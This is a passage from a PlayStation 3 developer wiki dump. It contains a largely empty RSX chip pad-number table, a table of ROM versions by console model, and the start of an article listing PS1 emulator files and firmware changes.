AF4 || || <br /> |-<br /> | AF5 || || <br /> |-<br /> | AF6 || || <br /> |-<br /> | AF7 || || <br /> |-<br /> | AF8 || || <br /> |-<br /> | AF9 || || <br /> |-<br /> | AF10 || || <br /> |-<br /> | AF11 || || <br /> |-<br /> | AF12 || || <br /> |-<br /> | AF13 || || <br /> |-<br /> | AF14 || || <br /> |-<br /> | AF15 || || <br /> |-<br /> | AF16 || || <br /> |-<br /> | AF17 || || <br /> |-<br /> | AF18 || || <br /> |-<br /> | AF19 || || <br /> |-<br /> | AF20 || || <br /> |-<br /> | AF21 || || <br /> |-<br /> | AF22 || || <br /> |-<br /> | AF23 || || <br /> |-<br /> | AF24 || || <br /> |-<br /> | AF25 || || <br /> |-<br /> | AF26 || || <br /> |-<br /> | AF27 || || <br /> |-<br /> | AF28 || || <br /> |-<br /> | AF29 || || <br /> |-<br /> | AF30 || || <br /> |-<br /> | AF31 || || <br /> |-<br /> | AF32 || || <br /> |-<br /> | AF33 || || <br /> |-<br /> | AF34 || || <br /> |-<br /> | AF35 || || <br /> |-<br /> | AF36 || || <br /> |-<br /> | AF37 || || <br /> |-<br /> | AF38 || || <br /> |-<br /> | AF39 || || <br /> |-<br /> | AF40 || || <br /> |-<br /> | AF41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AG<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AG1 || || <br /> |-<br /> | AG2 || || <br /> |-<br /> | AG3 || || <br /> |-<br /> | AG4 || || <br /> |-<br /> | AG5 || || <br /> |-<br /> | AG6 || || <br /> |-<br /> | AG7 || || <br /> |-<br /> | AG8 || || <br /> |-<br /> | AG9 || || <br /> |-<br /> | AG10 || || <br /> |-<br /> | AG11 || || <br /> |-<br /> | AG12 || || <br /> |-<br /> | AG13 || || <br /> |-<br /> | AG14 || || <br /> |-<br /> | AG15 || || <br /> |-<br /> | AG16 || || <br /> |-<br /> | AG17 || || <br /> |-<br /> | AG18 || || <br /> |-<br /> | AG19 || || <br /> |-<br /> | AG20 || || <br /> |-<br /> | AG21 || || <br /> |-<br /> | AG22 || || <br /> |-<br /> | AG23 || || <br /> |-<br /> | AG24 || || <br /> |-<br /> | AG25 || || <br /> |-<br /> | AG26 || || <br /> |-<br /> | AG27 || || <br /> |-<br /> | AG28 || || <br /> |-<br /> | AG29 || || <br /> |-<br /> | AG30 || || <br /> |-<br /> | AG31 || || <br /> |-<br /> | AG32 || || <br /> |-<br /> | AG33 || || <br /> |-<br /> | AG34 || || <br /> |-<br /> | AG35 || || <br /> |-<br /> | AG36 || || <br /> |-<br /> | AG37 || || <br /> |-<br /> | AG38 || || <br /> |-<br /> | AG39 || || <br /> |-<br /> | AG40 || || <br /> |-<br /> | AG41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AH<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AH1 || || <br /> |-<br /> | AH2 || || <br /> |-<br /> | AH3 || || <br /> |-<br /> | AH4 || || <br /> |-<br /> | AH5 || || <br /> |-<br /> | AH6 || || <br /> |-<br /> | AH7 || || <br /> |-<br /> | AH8 || || <br /> |-<br /> | AH9 || || <br /> |-<br /> | AH10 || || <br /> |-<br /> | AH11 || || <br /> |-<br /> | AH12 || || <br /> |-<br /> | AH13 || || <br /> |-<br /> | AH14 || || <br /> |-<br /> | AH15 || || <br /> |-<br /> | AH16 || || <br /> |-<br /> | AH17 || || <br /> |-<br /> | AH18 || || <br /> |-<br /> | AH19 || || <br /> |-<br /> | AH20 || || <br /> |-<br /> | AH21 || || <br /> |-<br /> | AH22 || || <br /> |-<br /> | AH23 || || <br /> |-<br /> | AH24 || || <br /> |-<br /> | AH25 || || <br /> |-<br /> | AH26 || || <br /> |-<br /> | AH27 || || <br /> |-<br /> | AH28 || || <br /> |-<br /> | AH29 || || <br /> |-<br /> | AH30 || || <br /> |-<br /> | AH31 || || <br /> |-<br /> | AH32 || || <br /> |-<br /> | AH33 || || <br /> |-<br /> | AH34 || || <br /> |-<br /> | AH35 || || <br /> |-<br /> | AH36 || || <br /> |-<br /> | AH37 || || <br /> |-<br /> | AH38 || || <br /> |-<br /> | AH39 || || <br /> |-<br /> | AH40 || || <br /> |-<br /> | AH41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AJ<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AJ1 || || <br /> |-<br /> | AJ2 || || <br /> |-<br /> | AJ3 || || <br /> |-<br /> | AJ4 || || <br /> |-<br /> | AJ5 || || <br /> |-<br /> | AJ6 || || <br /> |-<br /> | AJ7 || || <br /> |-<br /> | AJ8 || || <br /> |-<br /> | AJ9 || || <br /> |-<br /> | AJ10 || || <br /> |-<br /> | AJ11 || || <br /> |-<br /> | AJ12 || || <br /> |-<br /> | AJ13 || || <br /> |-<br /> | AJ14 || || <br /> |-<br /> | AJ15 || || <br /> |-<br /> | AJ16 || || <br /> |-<br /> | AJ17 || || <br /> |-<br /> | AJ18 || || <br /> |-<br /> | AJ19 || || <br /> |-<br /> | AJ20 || || <br /> |-<br /> | AJ21 || || <br /> |-<br /> | AJ22 || || <br /> |-<br /> | AJ23 || || <br /> |-<br /> | AJ24 || || <br /> |-<br /> | AJ25 || || <br /> |-<br /> | AJ26 || || <br /> |-<br /> | AJ27 || || <br /> |-<br /> | AJ28 || || <br /> |-<br /> | AJ29 || || <br /> |-<br /> | AJ30 || || <br /> |-<br /> | AJ31 || || <br /> |-<br /> | AJ32 || || <br /> |-<br /> | AJ33 || || <br /> |-<br /> | AJ34 || || <br /> |-<br /> | AJ35 || || <br /> |-<br /> | AJ36 || || <br /> |-<br /> | AJ37 || || <br /> |-<br /> | AJ38 || || <br /> |-<br /> | AJ39 || || <br /> |-<br /> | AJ40 || || <br /> |-<br /> | AJ41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AK<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AK1 || || <br /> |-<br /> | AK2 || || <br /> |-<br /> | AK3 || || <br /> |-<br /> | AK4 || || <br /> |-<br /> | AK5 || || <br /> |-<br /> | AK6 || || <br /> |-<br /> | AK7 || || <br /> |-<br /> | AK8 || || <br /> |-<br /> | AK9 || || <br /> |-<br /> | AK10 || || <br /> |-<br /> | AK11 || || <br /> |-<br /> | AK12 || || <br /> |-<br /> | AK13 || || <br /> |-<br /> | AK14 || || <br /> |-<br /> | AK15 || || <br /> |-<br /> | AK16 || || <br /> |-<br /> | AK17 || || <br /> |-<br /> | AK18 || || <br /> |-<br /> | AK19 || || <br /> |-<br /> | AK20 || || <br /> |-<br /> | AK21 || || <br /> |-<br /> | AK22 || || <br /> |-<br /> | AK23 || || <br /> |-<br /> | AK24 || || <br /> |-<br /> | AK25 || || <br /> |-<br /> | AK26 || || <br /> |-<br /> | AK27 || || <br /> |-<br /> | AK28 || || <br /> |-<br /> | AK29 || || <br /> |-<br /> | AK30 || || <br /> |-<br /> | AK31 || || <br /> |-<br /> | AK32 || || <br /> |-<br /> | AK33 || || <br /> |-<br /> | AK34 || || <br /> |-<br /> | AK35 || || <br /> |-<br /> | AK36 || || <br /> |-<br /> | AK37 || || <br /> |-<br /> | AK38 || || <br /> |-<br /> | AK39 || || <br /> |-<br /> | AK40 || || <br /> |-<br /> | AK41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AL<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AL1 || || <br /> |-<br /> | AL2 || || <br /> |-<br /> | AL3 || || <br /> |-<br /> | AL4 || || <br /> |-<br /> | AL5 || || <br /> |-<br /> | AL6 || || <br /> |-<br /> | AL7 || || <br /> |-<br /> | AL8 || || <br /> |-<br /> | AL9 || || <br /> |-<br /> | AL10 || || <br /> |-<br /> | AL11 || || <br /> |-<br /> | AL12 || || <br /> |-<br /> | AL13 || || <br /> |-<br /> | AL14 || || <br /> |-<br /> | AL15 || || <br /> |-<br /> | AL16 || || <br /> |-<br /> | AL17 || || <br /> |-<br /> | AL18 || || <br /> |-<br /> | AL19 || || <br /> |-<br /> | AL20 || || <br /> |-<br /> | AL21 || || <br /> |-<br /> | AL22 || || <br /> |-<br /> | AL23 || || <br /> |-<br /> | AL24 || || <br /> |-<br /> | AL25 || || <br /> |-<br /> | AL26 || || <br /> |-<br /> | AL27 || || <br /> |-<br /> | AL28 || || <br /> |-<br /> | AL29 || || <br /> |-<br /> | AL30 || || <br /> |-<br /> | AL31 || || <br /> |-<br /> | AL32 || || <br /> |-<br /> | AL33 || || <br /> |-<br /> | AL34 || || <br /> |-<br /> | AL35 || || <br /> |-<br /> | AL36 || || <br /> |-<br /> | AL37 || || <br /> |-<br /> | AL38 || || <br /> |-<br /> | AL39 || || <br /> |-<br /> | AL40 || || <br /> |-<br /> | AL41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AM<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AM1 || || <br /> |-<br /> | AM2 || || <br /> |-<br /> | AM3 || || <br /> |-<br /> | AM4 || || <br /> |-<br /> | AM5 || || <br /> |-<br /> | AM6 || || <br /> |-<br /> | AM7 || || <br /> |-<br /> | AM8 || || <br /> |-<br /> | AM9 || || <br /> |-<br /> | AM10 || || <br /> |-<br /> | AM11 || || <br /> |-<br /> | AM12 || || <br /> |-<br /> | AM13 || || <br /> |-<br /> | AM14 || || <br /> |-<br /> | AM15 || || <br /> |-<br /> | AM16 || || <br /> |-<br /> | AM17 || || <br /> |-<br /> | AM18 || || <br /> |-<br /> | AM19 || || <br /> |-<br /> | AM20 || || <br /> |-<br /> | AM21 || || <br /> |-<br /> | AM22 || || <br /> |-<br /> | AM23 || || <br /> |-<br /> | AM24 || || <br /> |-<br /> | AM25 || || <br /> |-<br /> | AM26 || || <br /> |-<br /> | AM27 || || <br /> |-<br /> | AM28 || || <br /> |-<br /> | AM29 || || <br /> |-<br /> | AM30 || || <br /> |-<br /> | AM31 || || <br /> |-<br /> | AM32 || || <br /> |-<br /> | AM33 || || <br /> |-<br /> | AM34 || || <br /> |-<br /> | AM35 || || <br /> |-<br /> | AM36 || || <br /> |-<br /> | AM37 || || <br /> |-<br /> | AM38 || || <br /> |-<br /> | AM39 || || <br /> |-<br /> | AM40 || || <br /> |-<br /> | AM41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AN<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AN1 || || <br /> |-<br /> | AN2 || || <br /> |-<br /> | AN3 || || <br /> |-<br /> | AN4 || || <br /> |-<br /> | AN5 || || <br /> |-<br /> | AN6 || || <br /> |-<br /> | AN7 || || <br /> |-<br /> | AN8 || || <br /> |-<br /> | AN9 || || <br /> |-<br /> | AN10 || || <br /> |-<br /> | AN11 || || <br /> |-<br /> | AN12 || || <br /> |-<br /> | AN13 || || <br /> |-<br /> | AN14 || || <br /> |-<br /> | AN15 || || <br /> |-<br /> | AN16 || || <br /> |-<br /> | AN17 || || <br /> |-<br /> | AN18 || || <br /> |-<br /> | AN19 || || <br /> |-<br /> | AN20 || || <br /> |-<br /> | AN21 || || <br /> |-<br /> | AN22 || || <br /> |-<br /> | AN23 || || <br /> |-<br /> | AN24 || || <br /> |-<br /> | AN25 || || <br /> |-<br /> | AN26 || || <br /> |-<br /> | AN27 || || <br /> |-<br /> | AN28 || || <br /> |-<br /> | AN29 || || <br /> |-<br /> | AN30 || || <br /> |-<br /> | AN31 || || <br /> |-<br /> | AN32 || || <br /> |-<br /> | AN33 || || <br /> |-<br /> | AN34 || || <br /> |-<br /> | AN35 || || <br /> |-<br /> | AN36 || || <br /> |-<br /> | AN37 || || <br /> |-<br /> | AN38 || || <br /> |-<br /> | AN39 || || <br /> |-<br /> | AN40 || || <br /> |-<br /> | AN41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AP<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AP1 || || <br /> |-<br /> | AP2 || || <br /> |-<br /> | AP3 || || <br /> |-<br /> | AP4 || || <br /> |-<br /> | AP5 || || <br /> |-<br /> | AP6 || || <br /> |-<br /> | AP7 || || <br /> |-<br /> | AP8 || || <br /> |-<br /> | AP9 || || <br /> |-<br /> | AP10 || || <br /> |-<br /> | AP11 || || <br /> |-<br /> | AP12 || || <br /> |-<br /> | AP13 || || <br /> |-<br /> | AP14 || || <br /> |-<br /> | AP15 || || <br /> |-<br /> | AP16 || || <br /> |-<br /> | AP17 || || <br /> |-<br /> | AP18 || || <br /> |-<br /> | AP19 || || <br /> |-<br /> | AP20 || || <br /> |-<br /> | AP21 || || <br /> |-<br /> | AP22 || || <br /> |-<br /> | AP23 || || <br /> |-<br /> | AP24 || || <br /> |-<br /> | AP25 || || <br /> |-<br /> | AP26 || || <br /> |-<br /> | AP27 || || <br /> |-<br /> | AP28 || || <br /> |-<br /> | AP29 || || <br /> |-<br /> | AP30 || || <br /> |-<br /> | AP31 || || <br /> |-<br /> | AP32 || || <br /> |-<br /> | AP33 || || <br /> |-<br /> | AP34 || || <br /> |-<br /> | AP35 || || <br /> |-<br /> | AP36 || || <br /> |-<br /> | AP37 || || <br /> |-<br /> | AP38 || || <br /> |-<br /> | AP39 || || <br /> |-<br /> | AP40 || || <br /> |-<br /> | AP41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AR<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AR1 || || <br /> |-<br /> | AR2 || || <br /> |-<br /> | AR3 || || <br /> |-<br /> | AR4 || || <br /> |-<br /> | AR5 || || <br /> |-<br /> | AR6 || || <br /> |-<br /> | AR7 || || <br /> |-<br /> | AR8 || || <br /> |-<br /> | AR9 || || <br /> |-<br /> | AR10 || || <br /> |-<br /> | AR11 || || <br /> |-<br /> | AR12 || || <br /> |-<br /> | AR13 || || <br /> |-<br /> | AR14 || || <br /> |-<br /> | AR15 || || <br /> |-<br /> | AR16 || || <br /> |-<br /> | AR17 || || <br /> |-<br /> | AR18 || || <br /> |-<br /> | AR19 || || <br /> |-<br /> | AR20 || || <br /> |-<br /> | AR21 || || <br /> |-<br /> | AR22 || || <br /> |-<br /> | AR23 || || <br /> |-<br /> | AR24 || || <br /> |-<br /> | AR25 || || <br /> |-<br /> | AR26 || || <br /> |-<br /> | AR27 || || <br /> |-<br /> | AR28 || || <br /> |-<br /> | AR29 || || <br /> |-<br /> | AR30 || || <br /> |-<br /> | AR31 || || <br /> |-<br /> | AR32 || || <br /> |-<br /> | AR33 || || <br /> |-<br /> | AR34 || || <br /> |-<br /> | AR35 || || <br /> |-<br /> | AR36 || || <br /> |-<br /> | AR37 || || <br /> |-<br /> | AR38 || || <br /> |-<br /> | AR39 || || <br /> |-<br /> | AR40 || || <br /> |-<br /> | AR41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AT<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AT1 || || <br /> |-<br /> | AT2 || || <br /> |-<br /> | AT3 || || <br /> |-<br /> | AT4 || || <br /> |-<br /> | AT5 || || <br /> |-<br /> | AT6 || || <br /> |-<br /> | AT7 || || <br /> |-<br /> | AT8 || || <br /> |-<br /> | AT9 || || <br /> |-<br /> | AT10 || || <br /> |-<br /> | AT11 || || <br /> |-<br /> | AT12 || || <br /> |-<br /> | AT13 || || <br /> |-<br /> | AT14 || || <br /> |-<br /> | AT15 || || <br /> |-<br /> | AT16 || || <br /> |-<br /> | AT17 || || <br /> |-<br /> | AT18 || || <br /> |-<br /> | AT19 || || <br /> |-<br /> | AT20 || || <br /> |-<br /> | AT21 || || <br /> |-<br /> | AT22 || || <br /> |-<br /> | AT23 || || <br /> |-<br /> | AT24 || || <br /> |-<br /> | AT25 || || <br /> |-<br /> | AT26 || || <br /> |-<br /> | AT27 || || <br /> |-<br /> | AT28 || || <br /> |-<br /> | AT29 || || <br /> |-<br /> | AT30 || || <br /> |-<br /> | AT31 || || <br /> |-<br /> | AT32 || || <br /> |-<br /> | AT33 || || <br /> |-<br /> | AT34 || || <br /> |-<br /> | AT35 || || <br /> |-<br /> | AT36 || || <br /> |-<br /> | AT37 || || <br /> |-<br /> | AT38 || || <br /> |-<br /> | AT39 || || <br /> |-<br /> | AT40 || || <br /> |-<br /> | AT41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AU<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AU1 || || <br /> |-<br /> | AU2 || || <br /> |-<br /> | AU3 || || <br /> |-<br /> | AU4 || || <br /> |-<br /> | AU5 || || <br /> |-<br /> | AU6 || || <br /> |-<br /> | AU7 || || <br /> |-<br /> | AU8 || || <br /> |-<br /> | AU9 || || <br /> |-<br /> | AU10 || || <br /> |-<br /> | AU11 || || <br /> |-<br /> | AU12 || || <br /> |-<br /> | AU13 || || <br /> |-<br /> | AU14 || || <br /> |-<br /> | AU15 || || <br /> |-<br /> | AU16 || || <br /> |-<br /> | AU17 || || <br /> |-<br /> | AU18 || || <br /> |-<br /> | AU19 || || <br /> |-<br /> | AU20 || || <br /> |-<br /> | AU21 || || <br /> |-<br /> | AU22 || || <br /> |-<br /> | AU23 || || <br /> |-<br /> | AU24 || || <br /> |-<br /> | AU25 || || <br /> |-<br /> | AU26 || || <br /> |-<br /> | AU27 || || <br /> |-<br /> | AU28 || || <br /> |-<br /> | AU29 || || <br /> |-<br /> | AU30 || || <br /> |-<br /> | AU31 || || <br /> |-<br /> | AU32 || || <br /> |-<br /> | AU33 || || <br /> |-<br /> | AU34 || || <br /> |-<br /> | AU35 || || <br /> |-<br /> | AU36 || || <br /> |-<br /> | AU37 || || <br /> |-<br /> | AU38 || || <br /> |-<br /> | AU39 || || <br /> |-<br /> | AU40 || || <br /> |-<br /> | AU41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AV<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AV1 || || <br /> |-<br /> | AV2 || || <br /> |-<br /> | AV3 || || <br /> |-<br /> | AV4 || || <br /> |-<br /> | AV5 || || <br /> |-<br /> | AV6 || || <br /> |-<br /> | AV7 || || <br /> |-<br /> | AV8 || || <br /> |-<br /> | AV9 || || <br /> |-<br /> | AV10 || || <br /> |-<br /> | AV11 || || <br /> |-<br /> | AV12 || || <br /> |-<br /> | AV13 || || <br /> |-<br /> | AV14 || || <br /> |-<br /> | AV15 || || <br /> |-<br /> | AV16 || || <br /> |-<br /> | AV17 || || <br /> |-<br /> | AV18 || || <br /> |-<br /> | AV19 || || <br /> |-<br /> | AV20 || || <br /> |-<br /> | AV21 || || <br /> |-<br /> | AV22 || || <br /> |-<br /> | AV23 || || <br /> |-<br /> | AV24 || || <br /> |-<br /> | AV25 || || <br /> |-<br /> | AV26 || || <br /> |-<br /> | AV27 || || <br /> |-<br /> | AV28 || || <br /> |-<br /> | AV29 || || <br /> |-<br /> | AV30 || || <br /> |-<br /> | AV31 || || <br /> |-<br /> | AV32 || || <br /> |-<br /> | AV33 || || <br /> |-<br /> | AV34 || || <br /> |-<br /> | AV35 || || <br /> |-<br /> | AV36 || || <br /> |-<br /> | AV37 || || <br /> |-<br /> | AV38 || || <br /> |-<br /> | AV39 || || <br /> |-<br /> | AV40 || || <br /> |-<br /> | AV41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AW<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AW1 || || <br /> |-<br /> | AW2 || || <br /> |-<br /> | AW3 || || <br /> |-<br /> | AW4 || || <br /> |-<br /> | AW5 || || <br /> |-<br /> | AW6 || || <br /> |-<br /> | AW7 || || <br /> |-<br /> | AW8 || || <br /> |-<br /> | AW9 || || <br /> |-<br /> | AW10 || || <br /> |-<br /> | AW11 || || <br /> |-<br /> | AW12 || || <br /> |-<br /> | AW13 || || <br /> |-<br /> | AW14 || || <br /> |-<br /> | AW15 || || <br /> |-<br /> | AW16 || || <br /> |-<br /> | AW17 || || <br /> |-<br /> | AW18 || || <br /> |-<br /> | AW19 || || <br /> |-<br /> | AW20 || || <br /> |-<br /> | AW21 || || <br /> |-<br /> | AW22 || || <br /> |-<br /> | AW23 || || <br /> |-<br /> | AW24 || || <br /> |-<br /> | AW25 || || <br /> |-<br /> | AW26 || || <br /> |-<br /> | AW27 || || <br /> |-<br /> | AW28 || || <br /> |-<br /> | AW29 || || <br /> |-<br /> | AW30 || || <br /> |-<br /> | AW31 || || <br /> |-<br /> | AW32 || || <br /> |-<br /> | AW33 || || <br /> |-<br /> | AW34 || || <br /> |-<br /> | AW35 || || <br /> |-<br /> | AW36 || || <br /> |-<br /> | AW37 || || <br /> |-<br /> | AW38 || || <br /> |-<br /> | AW39 || || <br /> |-<br /> | AW40 || || <br /> |-<br /> | AW41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AY<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AY1 || || <br /> |-<br /> | AY2 || || <br /> |-<br /> | AY3 || || <br /> |-<br /> | AY4 || || <br /> |-<br /> | AY5 || || <br /> |-<br /> | AY6 || || <br /> |-<br /> | AY7 || || <br /> |-<br /> | AY8 || || <br /> |-<br /> | AY9 || || <br /> |-<br /> | AY10 || || <br /> |-<br /> | AY11 || || <br /> |-<br /> | AY12 || || <br /> |-<br /> | AY13 || || <br /> |-<br /> | AY14 || || <br /> |-<br /> | AY15 || || <br /> |-<br /> | AY16 || || <br /> |-<br /> | AY17 || || <br /> |-<br /> | AY18 || || <br /> |-<br /> | AY19 || || <br /> |-<br /> | AY20 || || <br /> |-<br /> | AY21 || || <br /> |-<br /> | AY22 || || <br /> |-<br /> | AY23 || || <br /> |-<br /> | AY24 || || <br /> |-<br /> | AY25 || || <br /> |-<br /> | AY26 || || <br /> |-<br /> | AY27 || || <br /> |-<br /> | AY28 || || <br /> |-<br /> | AY29 || || <br /> |-<br /> | AY30 || || <br /> |-<br /> | AY31 || || <br /> |-<br /> | AY32 || || <br /> |-<br /> | AY33 || || <br /> |-<br /> | AY34 || || <br /> |-<br /> | AY35 || || <br /> |-<br /> | AY36 || || <br /> |-<br /> | AY37 || || <br /> |-<br /> | AY38 || || <br /> |-<br /> | AY39 || || <br /> |-<br /> | AY40 || || <br /> |-<br /> | AY41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AZ<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AZ1 || || <br /> |-<br /> | AZ2 || || <br /> |-<br /> | AZ3 || || <br /> |-<br /> | AZ4 || || <br /> |-<br /> | AZ5 || || <br /> |-<br /> | AZ6 || || <br /> |-<br /> | AZ7 || || <br /> |-<br /> | AZ8 || || <br /> |-<br /> | AZ9 || || <br /> |-<br /> | AZ10 || || <br /> |-<br /> | AZ11 || || <br /> |-<br /> | AZ12 || || <br /> |-<br /> | AZ13 || || <br /> |-<br /> | AZ14 || || <br /> |-<br /> | AZ15 || || <br /> |-<br /> | AZ16 || || <br /> |-<br /> | AZ17 || || <br /> |-<br /> | AZ18 || || <br /> |-<br /> | AZ19 || || <br /> |-<br /> | AZ20 || || <br /> |-<br /> | AZ21 || || <br /> |-<br /> | AZ22 || || <br /> |-<br /> | AZ23 || || <br /> |-<br /> | AZ24 || || <br /> |-<br /> | AZ25 || || <br /> |-<br /> | AZ26 || || <br /> |-<br /> | AZ27 || || <br /> |-<br /> | AZ28 || || <br /> |-<br /> | AZ29 || || <br /> |-<br /> | AZ30 || || <br /> |-<br /> | AZ31 || || <br /> |-<br /> | AZ32 || || <br /> |-<br /> | AZ33 || || <br /> |-<br /> | AZ34 || || <br /> |-<br /> | AZ35 || || <br /> |-<br /> | AZ36 || || <br /> |-<br /> | AZ37 || || <br /> |-<br /> | AZ38 || || <br /> |-<br /> | AZ39 || || <br /> |-<br /> | AZ40 || || <br /> |-<br /> | AZ41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | BA<br /> |-! Pad # !! Name !! Description<br /> |-<br /> | BA1 || ||<br /> |-<br /> | BA2 || ||<br /> |-<br /> | BA3 || ||<br /> |-<br /> | BA4 || ||<br /> |-<br /> | BA5 || ||<br /> |-<br /> | BA6 || ||<br /> |-<br /> | BA7 || ||<br /> |-<br /> | BA8 || || <br /> |-<br /> | BA9 || ||<br /> |-<br /> | BA10 || || <br /> |-<br /> | BA11 || ||<br /> |-<br /> | BA12 || || <br /> |-<br /> | BA13 || ||<br /> |-<br /> | BA14 || || <br /> |-<br /> | BA15 || || <br /> |-<br /> | BA16 || || <br /> |-<br /> | BA17 || || <br /> |-<br /> | BA18 || || <br /> |-<br /> | BA19 || || <br /> |-<br /> | BA20 || || <br /> |-<br /> | BA21 || || <br /> |-<br /> | BA22 || || <br /> |-<br /> | BA23 || || <br /> |-<br /> | BA24 || || <br /> |-<br /> | BA25 || || <br /> |-<br /> | BA26 || || <br /> |-<br /> | BA27 || || <br /> |-<br /> | BA28 || || <br /> |-<br /> | BA29 || || <br /> |-<br /> | BA30 || || <br /> |-<br /> | BA31 || || <br /> |-<br /> | BA32 || || <br /> |-<br /> | BA33 || || <br /> |-<br /> | BA34 || || <br /> |-<br /> | BA35 || || <br /> |-<br /> | BA36 || || <br /> |-<br /> | BA37 || || <br /> |-<br /> | BA38 || || <br /> |-<br /> | BA39 || || <br /> |-<br /> | BA40 || || <br /> |-<br /> | BA41 || || <br /> |-<br /> |}<br /> ''remark: the following Pad #letter's are not used: I, O, Q, S, X, Z, AI, AO, AQ, AS, AX, AZ''<br /> &lt;/div&gt;<br /> <br /> <br /> <br /> ----<br /> Some I2C thermo experiments from Cell/RSX/board are referenced here: http://stefde69.blogspot.com/2011_05_01_archive.html<br /> <br /> == Rom Versions ==<br /> <br /> {| class=&quot;wikitable sortable&quot;<br /> ! Rom Version !! RSX Serial !! PS3 Model !! PS3 Prod. Date !! Notes<br /> |-<br /> | a01 || ? || [[DEH-R1000]]? || ? ||<br /> |-<br /> | rowspan=&quot;2&quot; | a02 || rowspan=&quot;2&quot; | ? || [[DEH-R1010]]? || ? ||<br /> |-<br /> | [[DEH-R1020]]? || ? ||<br /> |- bgcolor=&quot;#CCCCCC&quot;<br /> | colspan=&quot;5&quot; |<br /> |-<br /> | rowspan=&quot;5&quot; | b01 || rowspan=&quot;5&quot; | [[CXD2971GB]] || [[DEH-R1030]]? || ? ||<br /> |-<br /> | [[DEH-R1040]]? || ? || <br /> |-<br /> | [[DEH-H1001-D]] || June 2006 || <br /> |-<br /> | [[DECR-1000]] || June/July/August 2006 || <br /> |-<br /> | [[DEH-H1000A|DEH-H1000]] || ? || <br /> |-<br /> | b02? || [[CXD2971GB]]? || [[CBEH-1000-D]] || ? ||<br /> |-<br /> | b02 || [[CXD2971GB]] || [[DECR-1000]] || ? || <br /> |-<br /> | b03 || [[CXD2971GB]] || [[DECR-1000]] || January 2007 ||<br /> |- bgcolor=&quot;#CCCCCC&quot;<br /> | colspan=&quot;5&quot; |<br /> |-<br /> | b07 || [[CXD2971GB]]? || [[DECR-1000]] || ? ||<br /> |-<br /> | b08 || ? || [[CECHAxx]] || ? ||<br /> |-<br /> | b08 || ? || [[DECHA00A]] || January 2007 ||<br /> |- bgcolor=&quot;#CCCCCC&quot;<br /> | colspan=&quot;5&quot; |<br /> |-<br /> | rowspan=&quot;3&quot; | rsx65 a03 || rowspan=&quot;3&quot; | [[CXD2991GB]] || [[DEH-FH1500J-A]] || April 2008 ||<br /> |-<br /> | [[DEH-FH1500J-B]] || ? ||<br /> |-<br /> | [[CBEH-F1501-B]] || ? ||<br /> |-<br /> | rsx65 a06 || ? || [[DECR-1400]] || June 2009 ||<br /> |-<br /> |}</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Emulation&diff=45881 Emulation 2017-08-28T11:36:06Z <p>Mathieulh: /* Regioning */ Added debugging stations.</p> <hr /> <div>For backwards- and crossproduct compatibility, several files in dev_flash are available/used.<br /> <br /> == ps1emu ==<br /> Note: not available in early Tool/DECR and Debug/DEX firmwares (does not have dev_flash/ps1emu or ps2emu folder. dev_flash/vsh/etc/version.txt &amp; index.dat say: ¨ps1emu:NA@NA: ps2emu:NA@NA: ps2gxemu:NA@NA: emerald:NA@NA: bdp:NA@NA:¨).<br /> <br /> === Files ===<br /> ps1_emu.self (1.02++)<br /> ps1_netemu.self (1.70++)<br /> ps1_newemu.self (2.10++)<br /> ps1_rom.bin (2.10++) CRC32: D5FF6273 / CRC16: 111D (file is same as in 4.11 and all versions in between)<br /> <br /> * 1.70:<br /> **Added the ability to play original PlayStation format games downloaded from the PlayStation Store.<br /> **Added rumble functionality for USB accessories which support it when playing PS2 games.<br /> **Saved data from PlayStation format software now usable on both PSP and PS3 systems.<br /> **Backwards compatibility for PS1 and PS2 games was improved.<br /> <br /> * 2.10:<br /> **Users can now play PlayStation game discs on a PSP with remote play (this feature was not announced).<br /> **Backwards compatibility for PS1 and PS2 games was improved (Update was also unannounced but evident in Sony's backwards compatibility search site).<br /> <br /> Note: since 2.10++ all 3 ps1 emulators, ps1_emu.self, ps1_netemu.self, ps1_newemu.self uses the since then added ps1_rom.bin 